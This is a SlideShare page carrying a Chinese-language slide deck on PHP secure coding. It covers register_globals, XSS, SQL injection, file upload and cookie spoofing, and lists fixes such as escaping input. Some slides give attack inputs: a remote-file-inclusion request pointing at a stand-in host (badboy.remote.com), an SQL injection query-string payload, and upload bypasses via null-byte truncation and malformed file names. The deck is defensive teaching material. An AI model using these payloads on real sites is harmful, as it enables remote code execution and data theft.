0
PHP  安全编码 ( 二 ) @ 徐钦勇   (ken@shopex.cn)
Register Globals: Example <ul><li><?php   include   &quot;$path/script.php&quot; ;  ?>   </li></ul><ul><li>提交一个这样的请求 </li>...
XSS: Example
SQL Injection: Example
数字类型输入 数字大于 2147483647 会出现溢出出现负数
查询内容由外部输入 ?field=version() from injection_login where 1 #
SQL Injection: Solution <ul><li>过滤输入数据 </li></ul><ul><li>单引输入数据  </li></ul><ul><li>转义输入数据, mysql_real_escape_string () </l...
葵花宝典 PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
文件写入点 上传文件 写日志文件
文件上传 1. 验证文件类型 2. 验证文件后缀名
文件上传 1.00 截断 2. 畸形文件名
文件上传
文件写入点 写日志文件 <ul><li>防被下载 </li></ul><ul><li>防被执行 </li></ul>
COOKIE 欺诈
Q&A
Reference <ul><li>高级 PHP 应用程序漏洞审核技术 </li></ul>
Upcoming SlideShare
Loading in...5
×

Php safe-code

939

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
939
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
6
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Php safe-code"

  1. 1. PHP 安全编码 ( 二 ) @ 徐钦勇 (ken@shopex.cn)
  2. 2. Register Globals: Example <ul><li><?php include &quot;$path/script.php&quot; ; ?> </li></ul><ul><li>提交一个这样的请求 </li></ul><ul><li>?path=http%3A%2F%2Fbadboy.remote.com </li></ul><ul><li>include 'http://badboy.remote.com/script.php' ; </li></ul><ul><li>这样就产生一个远程包含漏洞 </li></ul>
  3. 3. XSS: Example
  4. 4. SQL Injection: Example
  5. 5. 数字类型输入 数字大于 2147483647 会出现溢出出现负数
  6. 6. 查询内容由外部输入 ?field=version() from injection_login where 1 #
  7. 7. SQL Injection: Solution <ul><li>过滤输入数据 </li></ul><ul><li>单引输入数据 </li></ul><ul><li>转义输入数据, mysql_real_escape_string () </li></ul>
  8. 8. 葵花宝典 PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
  9. 9. 文件写入点 上传文件 写日志文件
  10. 10. 文件上传 1. 验证文件类型 2. 验证文件后缀名
  11. 11. 文件上传 1.00 截断 2. 畸形文件名
  12. 12. 文件上传
  13. 13. 文件写入点 写日志文件 <ul><li>防被下载 </li></ul><ul><li>防被执行 </li></ul>
  14. 14. COOKIE 欺诈
  15. 15. Q&A
  16. 16. Reference <ul><li>高级 PHP 应用程序漏洞审核技术 </li></ul>
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×